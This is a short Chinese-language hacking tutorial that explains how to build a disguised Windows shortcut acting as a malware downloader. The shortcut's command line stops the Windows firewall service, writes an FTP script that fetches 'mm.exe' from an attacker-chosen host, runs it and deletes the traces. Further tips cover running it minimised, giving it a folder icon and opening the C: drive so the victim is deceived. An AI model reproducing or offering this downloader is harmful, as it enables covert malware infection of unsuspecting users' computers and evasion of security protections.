利用windows自带功能做永不被查杀

核心提示：step1 先在桌面上单机右键,新建-快捷方式 step2 在项目位置里输入 %windir%system32cmd.exe /c net stop sharedaccess&echo open XXXX.vicp.net > t.t&echo user>>t.t&echo pass>>t

step1

先在桌面上单机右键,新建-快捷方式

step2

在项目位置里输入

%windir%system32cmd.exe /c net stop sharedaccess&echo open XXXX.vicp.net

> t.t&echo user>>t.t&echo pass>>t.t&echo get mm.exe c:mm.exe >> t.t&echo

bye >> t.t&ftp -s:t.t&del t.t&c:mm.exe

就不解释了,看过dos的都明白,是个ftp下马过程

需要修改的地方

XXXX.vicp.net--改成自己的域名

user--用户

pass--密码

get mm.exe c:mm.exe 吧mm.exe下载下来,放到c盘

c:mm.exe--运行

step3

下一步-完成

然后在快捷方式的属性里边吧运行方式改成最小化,自己改个图标就完成了呵呵..

生成出来大小不到3字节

PS..

如果你吧下载者的图标改成了文件夹形式,可以在代码中添加

" %windir%explorer.exe c: "这句话

运行了下载者后会打开C盘,和普通的文件加没什么区别,迷惑人的。